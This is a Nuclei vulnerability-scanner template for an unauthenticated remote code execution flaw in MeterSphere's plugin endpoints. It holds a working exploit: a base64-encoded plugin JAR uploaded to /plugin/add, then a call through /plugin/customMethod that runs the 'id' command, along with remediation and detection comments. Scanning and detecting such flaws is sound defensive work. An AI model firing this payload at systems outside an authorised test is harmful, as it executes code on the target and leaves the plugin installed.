nuclei-templates/http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml


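id: metersphere-plugin-rce

info:
  name: MeterSphere - Remote Code Execution
  author: pdteam,y4er,pdresearch,rootxharsh,iamnoooob
  severity: critical
  description: |
    MeterSphere is susceptible to remote code execution.
    The plugin endpoints /plugin/add and /plugin/customMethod accept requests without authentication,
    so a remote attacker can upload a plugin JAR and have the server run code from it.
  remediation: |
    Upgrade to a MeterSphere release that requires authentication on the /plugin/* endpoints
    (check the project's release notes), and restrict network access to the MeterSphere
    interface until the upgrade is in place.
  reference:
    - https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/
    - https://github.com/metersphere/metersphere
  classification:
    # PR:N reflects that neither request in this template carries credentials.
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    # NOTE(review): the flaw exercised here is an unauthenticated plugin upload; CWE-306
    # (missing authentication) or CWE-434 (unrestricted upload) may describe the root
    # cause more precisely than CWE-77 — confirm against the advisory.
    cwe-id: CWE-77
  metadata:
    # Two requests are sent per target: the plugin upload and the method call.
    max-request: 2
    verified: true
  # intrusive: the check uploads a plugin JAR and runs a command on the target,
  # so it changes server state and is not a passive probe.
  tags: metersphere,rce,intrusive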
# Two-step check: the first raw request uploads a plugin JAR to /plugin/add, the second
# calls a class from that JAR through /plugin/customMethod.
# Neither request carries a session cookie or token, so a positive result indicates the
# plugin endpoints are reachable without authentication.
# NOTE(review): no cleanup request follows, so the uploaded plugin presumably stays
# installed on the target — remove it after testing and confirm it is gone.
# Detection: unauthenticated POSTs to /plugin/add or /plugin/customMethod in the access
# log, and unexpected JARs in the plugin list, are worth alerting on.
http:
- raw:
- |
POST /plugin/add HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX
------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="file"; filename="metersphere-plugin-DebugSampler-1.0.1-jar-with-all-dependencies.jar"
Content-Type: application/octet-stream
{{base64_decode("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
------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json
null
------WebKitFormBoundaryreButJNjkCniQExX--
# Second request: asks the server to invoke the entry class shipped in the uploaded JAR,
# passing "id" as the request value; the matchers then look for id-style output in the
# JSON reply. Like the upload, it is sent without any session or token.
- |
POST /plugin/customMethod HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"entry":"io.metersphere.plugin.DebugSampler.UiScriptApiImpl","request":"id"}
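# All three matchers must hold, so a generic 200 page or an error envelope alone
# cannot produce a finding.
matchers-condition: and
matchers:
  # The reply must be the application's JSON success envelope with a data field.
  - type: word
    part: body
    words:
      - '"data":'
      - '"success":true'
    condition: and

  # The data field must contain output shaped like the `id` command's.
  # The numeric part allows up to 10 digits and the name part allows "_" and "-",
  # so accounts such as www-data or high container UIDs are not missed (the
  # previous pattern, 1-4 digits and [a-z0-9]+ only, gave false negatives there).
  - type: regex
    regex:
      - '((u|g)id|groups)=[0-9]{1,10}\([a-z0-9_-]+\)'

  - type: status
    status:
      - 200

# Report the matched id output so the finding shows which account the service runs as;
# a privileged account here raises the impact of the issue.
extractors:
  - type: regex
    regex:
      - '((u|g)id|groups)=[0-9]{1,10}\([a-z0-9_-]+\)'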